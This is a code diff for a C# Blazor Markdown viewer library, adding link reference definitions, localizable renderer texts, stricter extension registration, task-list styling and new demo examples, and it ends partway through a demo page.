@@ -78,7 +78,7 @@ public sealed partial class BitMarkdownPipeline
         var lines = SplitLines(markdown);
         var context = new BitMarkdownParseContext(options, ScanReferenceLabels(lines));
 
-        document.Children.AddRange(ParseBlocks(lines, context, 0));
+        document.Children.AddRange(ParseBlocks(lines, context, 0, 0));
 
         foreach (var processor in AstProcessors)
             processor.Process(document, this);
@@ -115,7 +115,7 @@ public sealed partial class BitMarkdownPipeline
         return labels;
     }
 
-    internal List<BitMarkdownNode> ParseBlocks(IReadOnlyList<string> lines, BitMarkdownParseContext context, int depth)
+    internal List<BitMarkdownNode> ParseBlocks(IReadOnlyList<string> lines, BitMarkdownParseContext context, int depth, int lineOffset)
     {
         // Depth guard: stop recursing into ever-deeper nested blocks and instead keep
         // the remaining lines as a single plain-text paragraph. This caps recursion so
@@ -127,7 +127,7 @@ public sealed partial class BitMarkdownPipeline
             return new List<BitMarkdownNode> { para };
         }
 
-        return new BitMarkdownBlockProcessor(this, lines, context, depth).Run();
+        return new BitMarkdownBlockProcessor(this, lines, context, depth, lineOffset).Run();
     }
 
     internal List<BitMarkdownNode> ParseInlines(string text, BitMarkdownParseContext context, int depth)

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Pipeline/BitMarkdownPipelineBuilder.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Pipeline/BitMarkdownPipelineBuilder.cs
@@ -28,6 +28,7 @@ public sealed class BitMarkdownPipelineBuilder
     public BitMarkdownPipelineBuilder()
     {
         // Core block parsers.
+        BlockParsers.Add(new BitMarkdownLinkReferenceDefinitionParser());
         BlockParsers.Add(new BitMarkdownFencedCodeBlockParser());
         BlockParsers.Add(new BitMarkdownAtxHeadingParser());
         BlockParsers.Add(new BitMarkdownThematicBreakParser());
@@ -41,10 +42,16 @@ public sealed class BitMarkdownPipelineBuilder
         InlineParsers.Add(new BitMarkdownCodeSpanInlineParser());
         InlineParsers.Add(new BitMarkdownAutolinkInlineParser());
         InlineParsers.Add(new BitMarkdownLinkInlineParser());
+        InlineParsers.Add(new BitMarkdownEntityInlineParser());
         InlineParsers.Add(new BitMarkdownLineBreakInlineParser());
 
         // Core emphasis.
         DelimiterProcessors.Add(new BitMarkdownEmphasisDelimiterProcessor());
+
+        // Core AST processors. Reference links are completed, and the text runs the scanner
+        // split apart are put back together, before any flavor runs.
+        AstProcessors.Add(new BitMarkdownLinkReferenceAstProcessor());
+        AstProcessors.Add(new BitMarkdownTextMergeAstProcessor());
 
         // Core renderer (registered first so plugin renderers can override it).
         Renderers.Add(new BitMarkdownCoreRenderer());

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Pipeline/BitMarkdownPipelineBuilder.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Pipeline/BitMarkdownPipelineBuilder.cs
@@ -24,6 +24,12 @@ public sealed class BitMarkdownPipelineBuilder
     /// <summary>Node renderers. Later registrations take precedence over earlier ones.</summary>
     public List<BitMarkdownNodeRenderer> Renderers { get; } = new();
 
+    /// <summary>
+    /// The words the renderers write themselves - alert titles, footnote back-links, the accessible
+    /// names of the regions and controls the markup adds. Defaults to English.
+    /// </summary>
+    public BitMarkdownTexts Texts { get; set; } = BitMarkdownTexts.Default;
+
     /// <summary>Creates a builder pre-populated with the basic CommonMark core.</summary>
     public BitMarkdownPipelineBuilder()
     {

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Pipeline/BitMarkdownPipelineBuilder.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Pipeline/BitMarkdownPipelineBuilder.cs
@@ -28,7 +28,13 @@ public sealed class BitMarkdownPipelineBuilder
     /// The words the renderers write themselves - alert titles, footnote back-links, the accessible
     /// names of the regions and controls the markup adds. Defaults to English.
     /// </summary>
-    public BitMarkdownTexts Texts { get; set; } = BitMarkdownTexts.Default;
+    /// <remarks>
+    /// Every builder starts with an instance of its own, rather than sharing
+    /// <see cref="BitMarkdownTexts.Default"/>, because these are settable: overriding one word in
+    /// place - <c>builder.Texts.AlertNote = "Hinweis"</c> - would otherwise translate every other
+    /// pipeline in the process, the cached <see cref="BitMarkdownPipelines"/> ones included.
+    /// </remarks>
+    public BitMarkdownTexts Texts { get; set; } = new();
 
     /// <summary>Creates a builder pre-populated with the basic CommonMark core.</summary>
     public BitMarkdownPipelineBuilder()
@@ -63,12 +69,32 @@ public sealed class BitMarkdownPipelineBuilder
         Renderers.Add(new BitMarkdownCoreRenderer());
     }
 
-    /// <summary>Adds an extension. The same extension type is only applied once.</summary>
+    /// <summary>
+    /// Adds an extension. Adding the same flavor twice is a no-op, since the second one asks for
+    /// nothing the first did not already do.
+    /// </summary>
+    /// <exception cref="InvalidOperationException">
+    /// The flavor is already registered with a different configuration. Silently keeping the first
+    /// one would mean <c>UseAdvanced().UseAutoIdentifiers(anchorLinks: true)</c> quietly rendered no
+    /// permalinks at all - the options in the call the author wrote last would simply not apply.
+    /// Configure the flavor once, in the call that sets it up.
+    /// </exception>
     public BitMarkdownPipelineBuilder Use(IBitMarkdownExtension extension)
     {
         ArgumentNullException.ThrowIfNull(extension);
-        if (_extensions.Any(e => e.GetType() == extension.GetType()))
-            return this;
+        if (extension.AllowsMultiple is false)
+        {
+            var existing = _extensions.FirstOrDefault(e => e.GetType() == extension.GetType());
+            if (existing is not null)
+            {
+                if (existing.IsSameConfigurationAs(extension)) return this;
+
+                throw new InvalidOperationException(
+                    $"{extension.GetType().Name} is already registered on this pipeline with a different " +
+                    "configuration. An extension is set up once: pass the options to the call that adds it " +
+                    "(and add it before, or instead of, any bundle that adds it too).");
+            }
+        }
         // Snapshot every registration list so a failed Setup can be fully reverted
         // to its exact pre-Setup state. A misbehaving extension may insert, remove,
         // or reorder items before throwing, so a tail-truncating rollback is not
@@ -103,6 +129,20 @@ public sealed class BitMarkdownPipelineBuilder
             throw;
         }
         return this;
+    }
+
+    /// <summary>
+    /// Adds an extension unless one of its type is already registered, whatever that one's
+    /// configuration. This is how a bundle adds a flavor that takes options: the bundle asks for
+    /// the flavor, not for particular options, so <c>UseAutoIdentifiers(anchorLinks: true)</c>
+    /// before it keeps its anchors rather than being overruled by the bundle's default.
+    /// </summary>
+    public BitMarkdownPipelineBuilder UseIfAbsent(IBitMarkdownExtension extension)
+    {
+        ArgumentNullException.ThrowIfNull(extension);
+        if (_extensions.Any(e => e.GetType() == extension.GetType())) return this;
+
+        return Use(extension);
     }
 
     private static void Restore<T>(List<T> list, List<T> snapshot)

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Pipeline/IBitMarkdownExtension.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Pipeline/IBitMarkdownExtension.cs
@@ -23,4 +23,21 @@ public interface IBitMarkdownExtension
     /// <see cref="IBitMarkdownExtension"/>).
     /// </summary>
     void Setup(BitMarkdownPipelineBuilder builder);
+
+    /// <summary>
+    /// True when several instances of this extension may be registered on one pipeline, each
+    /// applying in turn. Defaults to <c>false</c>: a flavor is a flavor, and adding it twice is a
+    /// duplicate rather than two of anything. An extension whose whole content is a caller-supplied
+    /// rule - a URL rewrite - overrides this, so two of them compose instead of one being refused.
+    /// </summary>
+    bool AllowsMultiple => false;
+
+    /// <summary>
+    /// True when <paramref name="other"/> - always an extension of this same type - is configured
+    /// the way this one is, so registering it changes nothing and can be skipped. Defaults to
+    /// <c>true</c>, which is right for a flavor that has nothing to configure; an extension that
+    /// takes options compares them, so that adding it a second time with different ones is
+    /// reported instead of silently doing nothing.
+    /// </summary>
+    bool IsSameConfigurationAs(IBitMarkdownExtension other) => true;
 }

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Rendering/BitMarkdownCoreRenderer.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Rendering/BitMarkdownCoreRenderer.cs
@@ -8,7 +8,8 @@ public sealed class BitMarkdownCoreRenderer : BitMarkdownNodeRenderer
     public override bool Accept(BitMarkdownNode node) => node is
         BitMarkdownHeadingNode or BitMarkdownParagraphNode or BitMarkdownCodeBlockNode or BitMarkdownBlockquoteNode or BitMarkdownListNode
         or BitMarkdownThematicBreakNode or BitMarkdownTextNode or BitMarkdownEmphasisNode or BitMarkdownStrongNode or BitMarkdownCodeSpanNode
-        or BitMarkdownLinkNode or BitMarkdownImageNode or BitMarkdownLineBreakNode;
+        or BitMarkdownLinkNode or BitMarkdownImageNode or BitMarkdownLineBreakNode
+        or BitMarkdownLinkReferenceDefinitionNode or BitMarkdownLinkReferenceNode;
 
     // Render-tree sequence numbers must be compile-time literals tied to a fixed
     // call site (never values produced at runtime), so Blazor's diff can match nodes
@@ -107,6 +108,10 @@ public sealed class BitMarkdownCoreRenderer : BitMarkdownNodeRenderer
                     b.AddAttribute(22, "title", img.Title);
                 // Never leak the (possibly token-bearing) page URL to the image host.
                 b.AddAttribute(28, "referrerpolicy", "no-referrer");
+                // A long document is mostly off-screen when it first paints, so images
+                // fetch and decode only as they approach the viewport.
+                b.AddAttribute(29, "loading", "lazy");
+                b.AddAttribute(30, "decoding", "async");
                 b.CloseElement();
                 break;
 
@@ -120,6 +125,20 @@ public sealed class BitMarkdownCoreRenderer : BitMarkdownNodeRenderer
                 {
                     b.AddContent(24, "\n");
                 }
+                break;
+
+            case BitMarkdownLinkReferenceDefinitionNode:
+                // A definition declares a label; it is not part of the rendered document.
+                // BitMarkdownLinkReferenceAstProcessor normally removes it before this
+                // point, so reaching here means the AST was rendered without the core
+                // processors - render nothing rather than the raw definition line.
+                break;
+
+            case BitMarkdownLinkReferenceNode reference:
+                // An unresolved reference reads as the text it was written as.
+                b.AddContent(31, reference.RawPrefix);
+                r.WriteNodes(b, reference.Children);
+                b.AddContent(32, reference.RawSuffix);
                 break;
         }
     }

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Rendering/BitMarkdownCoreRenderer.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Rendering/BitMarkdownCoreRenderer.cs
@@ -35,11 +35,18 @@ public sealed class BitMarkdownCoreRenderer : BitMarkdownNodeRenderer
                 break;
 
             case BitMarkdownCodeBlockNode code:
+                // The language class goes on both elements: a highlighter reads it off the <code>,
+                // while several of their plugins (line numbers, toolbars) read it off the <pre>.
+                // The info string may carry more than the language, so only its first word is used.
+                string? language = string.IsNullOrWhiteSpace(code.Info)
+                    ? null
+                    : "language-" + code.Info.Split((char[]?)null, StringSplitOptions.RemoveEmptyEntries)[0];
                 b.OpenElement(3, "pre");
+                if (language is not null)
+                    b.AddAttribute(35, "class", language);
                 b.OpenElement(4, "code");
-                if (!string.IsNullOrWhiteSpace(code.Info))
-                    b.AddAttribute(5, "class", "language-"
-                        + code.Info.Split((char[]?)null, StringSplitOptions.RemoveEmptyEntries)[0]);
+                if (language is not null)
+                    b.AddAttribute(5, "class", language);
                 b.AddContent(6, code.Content);
                 b.CloseElement();
                 b.CloseElement();
@@ -148,12 +155,18 @@ public sealed class BitMarkdownCoreRenderer : BitMarkdownNodeRenderer
         b.OpenElement(25, list.Ordered ? "ol" : "ul");
         if (list.Ordered && list.Start != 1)
             b.AddAttribute(26, "start", list.Start);
+        // The class GitHub puts on a list holding checkboxes, so a stylesheet can drop the
+        // bullets without depending on ":has()".
+        if (list.Items.Exists(i => i.IsTask))
+            b.AddAttribute(33, "class", "contains-task-list");
 
         foreach (var item in list.Items)
         {
             // The same literal is reused for every <li>; Blazor treats this like a
             // loop-rendered region and diffs the items by position.
             b.OpenElement(27, "li");
+            if (item.IsTask)
+                b.AddAttribute(34, "class", "task-list-item");
             // Tight lists render a lone paragraph's inlines directly inside <li>.
             if (list.Tight)
             {

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Rendering/BitMarkdownCoreRenderer.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Rendering/BitMarkdownCoreRenderer.cs
@@ -94,7 +94,7 @@ public sealed class BitMarkdownCoreRenderer : BitMarkdownNodeRenderer
                 if (!string.IsNullOrEmpty(link.Url))
                 {
                     b.AddAttribute(15, "href", link.Url);
-                    if (IsExternal(link.Url))
+                    if (BitMarkdownLinkHelpers.IsExternalUrl(link.Url))
                     {
                         b.AddAttribute(16, "target", "_blank");
                         b.AddAttribute(17, "rel", "noopener noreferrer");
@@ -186,8 +186,4 @@ public sealed class BitMarkdownCoreRenderer : BitMarkdownNodeRenderer
         }
         b.CloseElement();
     }
-
-    private static bool IsExternal(string url) =>
-        url.StartsWith("http://", StringComparison.OrdinalIgnoreCase) ||
-        url.StartsWith("https://", StringComparison.OrdinalIgnoreCase);
 }

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Rendering/BitMarkdownRenderer.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Rendering/BitMarkdownRenderer.cs
@@ -11,7 +11,25 @@ public sealed class BitMarkdownRenderer
 {
     private readonly IReadOnlyList<BitMarkdownNodeRenderer> _renderers;
 
-    public BitMarkdownRenderer(IReadOnlyList<BitMarkdownNodeRenderer> renderers) => _renderers = renderers;
+    /// <summary>Creates a renderer that writes its own words in English.</summary>
+    public BitMarkdownRenderer(IReadOnlyList<BitMarkdownNodeRenderer> renderers)
+        : this(renderers, BitMarkdownTexts.Default)
+    {
+    }
+
+    /// <summary>Creates a renderer that writes its own words from <paramref name="texts"/>.</summary>
+    public BitMarkdownRenderer(IReadOnlyList<BitMarkdownNodeRenderer> renderers, BitMarkdownTexts texts)
+    {
+        _renderers = renderers;
+        Texts = texts ?? BitMarkdownTexts.Default;
+    }
+
+    /// <summary>
+    /// The words the renderers write themselves - alert titles, footnote back-links, the accessible
+    /// names of the regions and controls the markup adds. A renderer reads them from here rather
+    /// than hard-coding English.
+    /// </summary>
+    public BitMarkdownTexts Texts { get; }
 
     /// <summary>Renders a sequence of nodes.</summary>
     public void WriteNodes(RenderTreeBuilder builder, IEnumerable<BitMarkdownNode> nodes)

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Rendering/BitMarkdownTexts.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Rendering/BitMarkdownTexts.cs
@@ -14,7 +14,12 @@ namespace Bit.BlazorUI;
 /// </remarks>
 public class BitMarkdownTexts
 {
-    /// <summary>The shared instance used by a pipeline that was not given texts of its own.</summary>
+    /// <summary>
+    /// The shared instance a renderer falls back to when it was handed none. It is process-wide, so
+    /// setting a word on it translates every such renderer; a pipeline that needs its own wording
+    /// is given it with <c>UseTexts</c> (or by setting the builder's <c>Texts</c>), which starts
+    /// from an instance of that builder's own.
+    /// </summary>
     public static BitMarkdownTexts Default { get; } = new();
 
     /// <summary>The title of a <c>&gt; [!NOTE]</c> alert.</summary>

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Rendering/BitMarkdownTexts.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Rendering/BitMarkdownTexts.cs
@@ -1,0 +1,68 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// The words the renderers write into a document themselves, rather than taking them from the
+/// source: an alert's title, a footnote's back-link, the name of a table's scroll region. All
+/// strings default to English; override the ones you need to localize a rendered document.
+/// </summary>
+/// <remarks>
+/// These are a property of the pipeline, so they are chosen once where the flavors are - a
+/// rendered document has no other place to learn what language it is in. Two of them
+/// (<see cref="FootnoteBackReference"/> and <see cref="Task"/>) name a numbered thing and take the
+/// number through <c>{0}</c>; <see cref="FootnoteBackReferenceOccurrence"/> takes the footnote's
+/// number and the citation's through <c>{0}</c> and <c>{1}</c>.
+/// </remarks>
+public class BitMarkdownTexts
+{
+    /// <summary>The shared instance used by a pipeline that was not given texts of its own.</summary>
+    public static BitMarkdownTexts Default { get; } = new();
+
+    /// <summary>The title of a <c>&gt; [!NOTE]</c> alert.</summary>
+    public string AlertNote { get; set; } = "Note";
+
+    /// <summary>The title of a <c>&gt; [!TIP]</c> alert.</summary>
+    public string AlertTip { get; set; } = "Tip";
+
+    /// <summary>The title of a <c>&gt; [!IMPORTANT]</c> alert.</summary>
+    public string AlertImportant { get; set; } = "Important";
+
+    /// <summary>The title of a <c>&gt; [!WARNING]</c> alert.</summary>
+    public string AlertWarning { get; set; } = "Warning";
+
+    /// <summary>The title of a <c>&gt; [!CAUTION]</c> alert.</summary>
+    public string AlertCaution { get; set; } = "Caution";
+
+    /// <summary>The accessible name of the footnotes section.</summary>
+    public string Footnotes { get; set; } = "Footnotes";
+
+    /// <summary>The accessible name of a footnote's back-link, given the footnote's number.</summary>
+    public string FootnoteBackReference { get; set; } = "Back to reference {0}";
+
+    /// <summary>
+    /// The accessible name of one of several back-links on the same footnote, given the footnote's
+    /// number and the citation's.
+    /// </summary>
+    public string FootnoteBackReferenceOccurrence { get; set; } = "Back to reference {0}-{1}";
+
+    /// <summary>The accessible name of the scrollable region a table sits in.</summary>
+    public string Table { get; set; } = "Table";
+
+    /// <summary>The accessible name of a heading's permalink, given the heading's text.</summary>
+    public string PermalinkTo { get; set; } = "Permalink to {0}";
+
+    /// <summary>The accessible name of a permalink whose heading has no text of its own.</summary>
+    public string PermalinkToSection { get; set; } = "Permalink to this section";
+
+    /// <summary>The accessible name of an interactive task-list checkbox, given its number.</summary>
+    public string Task { get; set; } = "Task {0}";
+
+    /// <summary>Returns the title of the given alert kind.</summary>
+    public string GetAlertTitle(BitMarkdownAlertKind kind) => kind switch
+    {
+        BitMarkdownAlertKind.Tip => AlertTip,
+        BitMarkdownAlertKind.Important => AlertImportant,
+        BitMarkdownAlertKind.Warning => AlertWarning,
+        BitMarkdownAlertKind.Caution => AlertCaution,
+        _ => AlertNote
+    };
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Syntax/BitMarkdownLineBreakNode.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Syntax/BitMarkdownLineBreakNode.cs
@@ -3,5 +3,5 @@ namespace Bit.BlazorUI;
 /// <summary>A line break. Hard breaks render as <c>&lt;br /&gt;</c>.</summary>
 public sealed class BitMarkdownLineBreakNode : BitMarkdownNode
 {
-    public bool Hard { get; init; }
+    public bool Hard { get; set; }
 }

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Syntax/BitMarkdownLinkNode.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Syntax/BitMarkdownLinkNode.cs
@@ -5,6 +5,15 @@ public sealed class BitMarkdownLinkNode : BitMarkdownNode
 {
     public string Url { get; init; } = string.Empty;
     public string? Title { get; init; }
+
+    /// <summary>
+    /// True when the link was not written as one: a bare URL in the text, or an angle-bracket
+    /// autolink. Its text is its destination, so a flavor that rewrites text - typographic
+    /// replacement, above all - has to leave this one's alone, or the URL a reader copies off the
+    /// page stops being the URL the link goes to.
+    /// </summary>
+    public bool IsAutoLink { get; init; }
+
     public List<BitMarkdownNode> Children { get; } = new();
     public override IList<BitMarkdownNode> ChildNodes => Children;
 }

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Syntax/BitMarkdownLinkReferenceDefinitionNode.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Syntax/BitMarkdownLinkReferenceDefinitionNode.cs
@@ -1,0 +1,22 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// A link reference definition (<c>[label]: /url "title"</c>). It is not part of the
+/// rendered document: <see cref="BitMarkdownLinkReferenceAstProcessor"/> collects every
+/// definition, removes it from the tree, and uses it to resolve the matching
+/// <see cref="BitMarkdownLinkReferenceNode"/>s wherever they appear.
+/// </summary>
+public sealed class BitMarkdownLinkReferenceDefinitionNode : BitMarkdownNode
+{
+    /// <summary>The label as written in the source, before normalization.</summary>
+    public string Label { get; init; } = string.Empty;
+
+    /// <summary>The normalized label used to match references (see <see cref="BitMarkdownLinkHelpers.NormalizeLabel"/>).</summary>
+    public string NormalizedLabel { get; init; } = string.Empty;
+
+    /// <summary>The (already sanitized) destination.</summary>
+    public string Url { get; init; } = string.Empty;
+
+    /// <summary>The optional title.</summary>
+    public string? Title { get; init; }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Syntax/BitMarkdownLinkReferenceDefinitionNode.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Syntax/BitMarkdownLinkReferenceDefinitionNode.cs
@@ -14,8 +14,16 @@ public sealed class BitMarkdownLinkReferenceDefinitionNode : BitMarkdownNode
     /// <summary>The normalized label used to match references (see <see cref="BitMarkdownLinkHelpers.NormalizeLabel"/>).</summary>
     public string NormalizedLabel { get; init; } = string.Empty;
 
-    /// <summary>The (already sanitized) destination.</summary>
+    /// <summary>The destination, sanitized as a link.</summary>
     public string Url { get; init; } = string.Empty;
+
+    /// <summary>
+    /// The destination as written, decoded but not yet sanitized. A definition does not know
+    /// whether the references resolving against it are links or images, and the two are allowed
+    /// different schemes - an embedded <c>data:image/png</c> is a valid image source and never a
+    /// valid link - so each reference sanitizes this for what it actually is.
+    /// </summary>
+    public string RawUrl { get; init; } = string.Empty;
 
     /// <summary>The optional title.</summary>
     public string? Title { get; init; }

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Syntax/BitMarkdownLinkReferenceNode.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Syntax/BitMarkdownLinkReferenceNode.cs
@@ -1,0 +1,30 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// A reference link or image (<c>[text][ref]</c>, <c>[text][]</c>, <c>[text]</c>,
+/// <c>![alt][ref]</c>) whose destination is not known yet, because a link reference
+/// definition is allowed to appear after the reference that uses it.
+/// <see cref="BitMarkdownLinkReferenceAstProcessor"/> replaces every one of these once the
+/// whole document has been parsed - with a real link/image when the label resolves, and
+/// with the literal source text (<see cref="RawPrefix"/> + label + <see cref="RawSuffix"/>)
+/// when it does not.
+/// </summary>
+public sealed class BitMarkdownLinkReferenceNode : BitMarkdownNode
+{
+    /// <summary>The normalized label this reference points at.</summary>
+    public string Label { get; init; } = string.Empty;
+
+    /// <summary>True for <c>![alt][ref]</c>.</summary>
+    public bool IsImage { get; init; }
+
+    /// <summary>The literal source text before the label (<c>[</c> or <c>![</c>).</summary>
+    public string RawPrefix { get; init; } = "[";
+
+    /// <summary>The literal source text after the label (<c>]</c>, <c>][]</c> or <c>][ref]</c>).</summary>
+    public string RawSuffix { get; init; } = "]";
+
+    /// <summary>The parsed link label / image alt content.</summary>
+    public List<BitMarkdownNode> Children { get; } = new();
+
+    public override IList<BitMarkdownNode> ChildNodes => Children;
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Syntax/BitMarkdownListItemNode.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Syntax/BitMarkdownListItemNode.cs
@@ -11,4 +11,11 @@ public sealed class BitMarkdownListItemNode : BitMarkdownNode
     /// task markers before escaped literals are flattened during inline parsing.
     /// </summary>
     public string? Source { get; set; }
+
+    /// <summary>
+    /// True once the task-list flavor has recognized a <c>[ ]</c> / <c>[x]</c> marker on this item.
+    /// The renderer turns it into the <c>task-list-item</c> class, which is what lets a stylesheet
+    /// drop the bullet without relying on <c>:has()</c>.
+    /// </summary>
+    public bool IsTask { get; set; }
 }

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Syntax/BitMarkdownListItemNode.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Syntax/BitMarkdownListItemNode.cs
@@ -13,6 +13,14 @@ public sealed class BitMarkdownListItemNode : BitMarkdownNode
     public string? Source { get; set; }
 
     /// <summary>
+    /// The document line the item's marker was written on, counted from 0, or <c>-1</c> when the
+    /// item cannot be traced back to the source. It is what lets an edit be written back into the
+    /// line it came from - a ticked task box into its own <c>[ ]</c> marker - rather than found
+    /// again by a second scanner that would have to agree with the parser.
+    /// </summary>
+    public int SourceLine { get; set; } = -1;
+
+    /// <summary>
     /// True once the task-list flavor has recognized a <c>[ ]</c> / <c>[x]</c> marker on this item.
     /// The renderer turns it into the <c>task-list-item</c> class, which is what lets a stylesheet
     /// drop the bullet without relying on <c>:has()</c>.

--- a/src/BlazorUI/Demo/Client/Bit.BlazorUI.Demo.Client.Core/Pages/Components/Extras/MarkdownViewer/BitMarkdownViewerDemo.razor
+++ b/src/BlazorUI/Demo/Client/Bit.BlazorUI.Demo.Client.Core/Pages/Components/Extras/MarkdownViewer/BitMarkdownViewerDemo.razor
@@ -2,10 +2,10 @@
 
 <PageOutlet Url="components/markdownviewer"
             Title="MarkdownViewer"
-            Description="BitMarkdownViewer renders Markdown as real DOM entirely in C# - CommonMark plus GitHub flavors, alerts and footnotes - with no JavaScript interop and no third-party packages." />
+            Description="BitMarkdownViewer renders Markdown as real DOM entirely in C# - CommonMark plus the GitHub flavors, front matter, containers, definition lists, math and more - with no JavaScript interop and no third-party packages." />
 
 <DemoPage Name="MarkdownViewer"
-          Description="BitMarkdownViewer is a native, SEO friendly Blazor component that parses Markdown into an AST and renders it straight to the Blazor render tree. It covers CommonMark and, through composable pipelines, the GitHub flavors (tables, task lists, strikethrough, autolinks), alerts, footnotes and emoji - sanitizing URLs and hardening against untrusted input on the way."
+          Description="BitMarkdownViewer is a native, SEO friendly Blazor component that parses Markdown into an AST and renders it straight to the Blazor render tree - no JavaScript interop, no third-party packages. Composable pipelines add exactly the flavors a document needs, from the GitHub set to front matter, containers, definition lists and mathematics; URLs are sanitized and untrusted input bounded by default; and the parsed tree, the rendering of any node, and the words the renderers write themselves are all yours to change."
           SecondaryNames="@(["MdViewer", "MD"])"
           Parameters="componentParameters"
           PublicMembers="componentPublicMembers"
@@ -78,7 +78,137 @@
             <BitMarkdownViewer Markdown="@referencesMarkdown" />
         </DemoExample>
 
-        <DemoExample Title="Line breaks" RazorCode="@example6RazorCode" CsharpCode="@example6CsharpCode" Id="example6">
+        <DemoExample Title="Emphasis extras" RazorCode="@example6RazorCode" CsharpCode="@example6CsharpCode" Id="example6">
+            <div>
+                Beyond CommonMark's <code>*</code> / <code>_</code> and GFM's <code>~~</code>,
+                <code>UseEmphasisExtras()</code> adds the four marks technical writing keeps reaching for:
+                <code>~subscript~</code>, <code>^superscript^</code>, <code>++inserted++</code> and
+                <code>==highlighted==</code>, rendered as real <code>&lt;sub&gt;</code>, <code>&lt;sup&gt;</code>,
+                <code>&lt;ins&gt;</code> and <code>&lt;mark&gt;</code> elements rather than styled spans. Subscript
+                shares the <code>~</code> character with strikethrough - one tilde is subscript, two are strikethrough -
+                so enabling it implies strikethrough and the two can be added in either order. A lone <code>+</code> or
+                <code>=</code> in ordinary prose is never mistaken for a delimiter: both need a run of two.
+            </div>
+            <br />
+            <BitMarkdownViewer Markdown="@emphasisExtrasMarkdown" Pipeline="@emphasisExtrasPipeline" />
+        </DemoExample>
+
+        <DemoExample Title="Typography" RazorCode="@example7RazorCode" CsharpCode="@example7CsharpCode" Id="example7">
+            <div>
+                <code>UseSmartyPants()</code> turns the ASCII stand-ins authors type into the characters they mean:
+                straight quotes curl into typographic ones, <code>--</code> and <code>---</code> become en and em dashes,
+                <code>...</code> becomes an ellipsis and <code>&lt;&lt;</code> / <code>&gt;&gt;</code> become guillemets.
+                Whether a quote opens or closes is read from what precedes it, which is also what gives
+                <code>don't</code> its apostrophe. Only text is rewritten - code spans, code blocks and URLs keep every
+                character exactly as it was written.
+            </div>
+            <br />
+            <div class="mdv-columns">
+                <div class="mdv-column">
+                    <div class="mdv-column-title">Default</div>
+                    <BitMarkdownViewer Markdown="@typographyMarkdown" />
+                </div>
+                <div class="mdv-column">
+                    <div class="mdv-column-title">UseSmartyPants()</div>
+                    <BitMarkdownViewer Markdown="@typographyMarkdown" Pipeline="@smartyPantsPipeline" />
+                </div>
+            </div>
+        </DemoExample>
+
+        <DemoExample Title="Front matter" RazorCode="@example8RazorCode" CsharpCode="@example8CsharpCode" Id="example8">
+            <div>
+                A real <code>.md</code> file from a docs site or a static-site generator usually opens with a metadata
+                block fenced by <code>---</code> (YAML) or <code>+++</code> (TOML). Without
+                <code>UseFrontMatter()</code> that block is ordinary Markdown - a thematic break followed by a heading -
+                so the file renders with its metadata splashed across the top. The extension parses it into a
+                <code>BitMarkdownFrontMatterNode</code> that renders nothing and keeps the raw text, which
+                <code>BitMarkdownFrontMatterNode.Find(document)</code> reads back for you to hand to whichever
+                serializer you already use.
+            </div>
+            <br />
+            <div class="mdv-columns">
+                <div class="mdv-column">
+                    <div class="mdv-column-title">Default</div>
+                    <BitMarkdownViewer Markdown="@frontMatterMarkdown" />
+                </div>
+                <div class="mdv-column">
+                    <div class="mdv-column-title">UseFrontMatter()</div>
+                    <BitMarkdownViewer Markdown="@frontMatterMarkdown" Pipeline="@frontMatterPipeline" OnParsed="HandleFrontMatterParsed" />
+                    <div class="mdv-hint">Metadata read from the AST: @frontMatterText</div>
+                </div>
+            </div>
+        </DemoExample>
+
+        <DemoExample Title="Containers" RazorCode="@example9RazorCode" CsharpCode="@example9CsharpCode" Id="example9">
+            <div>
+                <code>UseContainers()</code> adds the <code>:::</code> fence documentation sites are written with. The
+                word after the fence names the container and becomes its class, and anything after that word is its
+                title - so <code>:::warning Read this first</code> renders as a titled callout without the renderer
+                knowing that "warning" means anything. Containers nest, and the stylesheet already colours the names a
+                docs site reaches for (<code>note</code>, <code>info</code>, <code>tip</code>, <code>success</code>,
+                <code>warning</code>, <code>caution</code>, <code>danger</code>); any other name is a plain block you
+                style yourself. One name means more than a class: <code>:::details</code> renders a real
